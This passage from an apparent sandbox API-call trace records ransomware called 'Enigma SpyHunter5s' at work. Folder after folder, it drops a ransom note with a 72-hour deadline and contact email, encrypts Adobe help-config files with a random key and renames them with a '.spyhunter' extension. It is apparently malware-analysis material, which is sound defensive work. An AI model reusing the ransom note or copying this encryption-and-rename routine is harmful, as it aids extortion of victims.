(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.668] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e370, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e370*=0x2ac, lpOverlapped=0x0) returned 1 [0179.668] CloseHandle (hObject=0x178) returned 1 [0179.669] GetProcessHeap () returned 0x2c0000 [0179.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e76960 | out: hHeap=0x2c0000) returned 1 [0179.669] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e310 | out: pbBuffer=0x57e310) returned 1 [0179.669] GetProcessHeap () returned 0x2c0000 [0179.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.669] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e308*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e308*=0x30) returned 1 [0179.669] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\uk_ua\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.669] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg") returned 79 [0179.669] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.669] GetProcessHeap () returned 0x2c0000 [0179.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0179.670] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e2cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e2cc*=0x15d, lpOverlapped=0x0) returned 1 [0179.670] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.670] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x57e2cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e2cc*=0x15d, lpOverlapped=0x0) returned 1 [0179.670] GetProcessHeap () returned 0x2c0000 [0179.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.670] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.671] WriteFile (in: hFile=0x178, lpBuffer=0x57e30c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e2cc, lpOverlapped=0x0 | out: lpBuffer=0x57e30c*, lpNumberOfBytesWritten=0x57e2cc*=0x4, lpOverlapped=0x0) returned 1 [0179.718] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e2cc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e2cc*=0x30, lpOverlapped=0x0) returned 1 [0179.718] CloseHandle (hObject=0x178) returned 1 [0179.718] GetProcessHeap () returned 0x2c0000 [0179.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.719] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.719] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\uk_ua\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\uk_ua\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.720] GetProcessHeap () returned 0x2c0000 [0179.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.720] GetProcessHeap () returned 0x2c0000 [0179.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.720] GetProcessHeap () returned 0x2c0000 [0179.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e76878 | out: hHeap=0x2c0000) returned 1 [0179.720] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\tr_tr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.721] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.721] WriteFile (in: hFile=0x178, lpBuffer=0x57e23f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e368, lpOverlapped=0x0 | out: lpBuffer=0x57e23f*, lpNumberOfBytesWritten=0x57e368*=0x127, lpOverlapped=0x0) returned 1 [0179.722] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.722] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e368, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e368*=0x2ac, lpOverlapped=0x0) returned 1 [0179.722] CloseHandle (hObject=0x178) returned 1 [0179.722] GetProcessHeap () returned 0x2c0000 [0179.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e76790 | out: hHeap=0x2c0000) returned 1 [0179.722] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e308 | out: pbBuffer=0x57e308) returned 1 [0179.722] GetProcessHeap () returned 0x2c0000 [0179.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.722] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e300*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e300*=0x30) returned 1 [0179.722] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\tr_tr\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.723] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg") returned 79 [0179.723] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.723] GetProcessHeap () returned 0x2c0000 [0179.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0179.723] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e2c4*=0x15d, lpOverlapped=0x0) returned 1 [0179.724] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.724] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x57e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e2c4*=0x15d, lpOverlapped=0x0) returned 1 [0179.724] GetProcessHeap () returned 0x2c0000 [0179.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.724] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.724] WriteFile (in: hFile=0x178, lpBuffer=0x57e304*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e2c4, lpOverlapped=0x0 | out: lpBuffer=0x57e304*, lpNumberOfBytesWritten=0x57e2c4*=0x4, lpOverlapped=0x0) returned 1 [0179.724] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e2c4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e2c4*=0x30, lpOverlapped=0x0) returned 1 [0179.724] CloseHandle (hObject=0x178) returned 1 [0179.724] GetProcessHeap () returned 0x2c0000 [0179.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.724] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.724] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\tr_tr\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\tr_tr\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.725] GetProcessHeap () returned 0x2c0000 [0179.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.725] GetProcessHeap () returned 0x2c0000 [0179.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.725] GetProcessHeap () returned 0x2c0000 [0179.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e766a8 | out: hHeap=0x2c0000) returned 1 [0179.726] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sv_se\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.726] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.726] WriteFile (in: hFile=0x178, lpBuffer=0x57e237*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e360, lpOverlapped=0x0 | out: lpBuffer=0x57e237*, lpNumberOfBytesWritten=0x57e360*=0x127, lpOverlapped=0x0) returned 1 [0179.727] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.727] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e360, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e360*=0x2ac, lpOverlapped=0x0) returned 1 [0179.727] CloseHandle (hObject=0x178) returned 1 [0179.727] GetProcessHeap () returned 0x2c0000 [0179.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e765c0 | out: hHeap=0x2c0000) returned 1 [0179.727] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e300 | out: pbBuffer=0x57e300) returned 1 [0179.727] GetProcessHeap () returned 0x2c0000 [0179.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.728] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e2f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e2f8*=0x30) returned 1 [0179.728] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sv_se\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.728] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg") returned 79 [0179.728] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.728] GetProcessHeap () returned 0x2c0000 [0179.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0179.729] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e2bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e2bc*=0x15d, lpOverlapped=0x0) returned 1 [0179.729] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.729] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x57e2bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e2bc*=0x15d, lpOverlapped=0x0) returned 1 [0179.729] GetProcessHeap () returned 0x2c0000 [0179.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.730] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.730] WriteFile (in: hFile=0x178, lpBuffer=0x57e2fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e2bc, lpOverlapped=0x0 | out: lpBuffer=0x57e2fc*, lpNumberOfBytesWritten=0x57e2bc*=0x4, lpOverlapped=0x0) returned 1 [0179.730] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e2bc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e2bc*=0x30, lpOverlapped=0x0) returned 1 [0179.730] CloseHandle (hObject=0x178) returned 1 [0179.730] GetProcessHeap () returned 0x2c0000 [0179.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.730] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.730] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sv_se\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sv_se\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.731] GetProcessHeap () returned 0x2c0000 [0179.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.731] GetProcessHeap () returned 0x2c0000 [0179.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.731] GetProcessHeap () returned 0x2c0000 [0179.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e764d8 | out: hHeap=0x2c0000) returned 1 [0179.731] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sl_si\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.732] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.732] WriteFile (in: hFile=0x178, lpBuffer=0x57e22f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e358, lpOverlapped=0x0 | out: lpBuffer=0x57e22f*, lpNumberOfBytesWritten=0x57e358*=0x127, lpOverlapped=0x0) returned 1 [0179.733] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.733] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e358, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e358*=0x2ac, lpOverlapped=0x0) returned 1 [0179.733] CloseHandle (hObject=0x178) returned 1 [0179.733] GetProcessHeap () returned 0x2c0000 [0179.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e763f0 | out: hHeap=0x2c0000) returned 1 [0179.733] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e2f8 | out: pbBuffer=0x57e2f8) returned 1 [0179.733] GetProcessHeap () returned 0x2c0000 [0179.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.733] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e2f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e2f0*=0x30) returned 1 [0179.733] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sl_si\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.734] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg") returned 79 [0179.734] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.734] GetProcessHeap () returned 0x2c0000 [0179.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0179.734] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e2b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e2b4*=0x15d, lpOverlapped=0x0) returned 1 [0179.735] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.735] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x57e2b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e2b4*=0x15d, lpOverlapped=0x0) returned 1 [0179.735] GetProcessHeap () returned 0x2c0000 [0179.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.735] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.735] WriteFile (in: hFile=0x178, lpBuffer=0x57e2f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e2b4, lpOverlapped=0x0 | out: lpBuffer=0x57e2f4*, lpNumberOfBytesWritten=0x57e2b4*=0x4, lpOverlapped=0x0) returned 1 [0179.735] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e2b4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e2b4*=0x30, lpOverlapped=0x0) returned 1 [0179.735] CloseHandle (hObject=0x178) returned 1 [0179.736] GetProcessHeap () returned 0x2c0000 [0179.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.736] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.736] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sl_si\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sl_si\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.737] GetProcessHeap () returned 0x2c0000 [0179.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.737] GetProcessHeap () returned 0x2c0000 [0179.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.737] GetProcessHeap 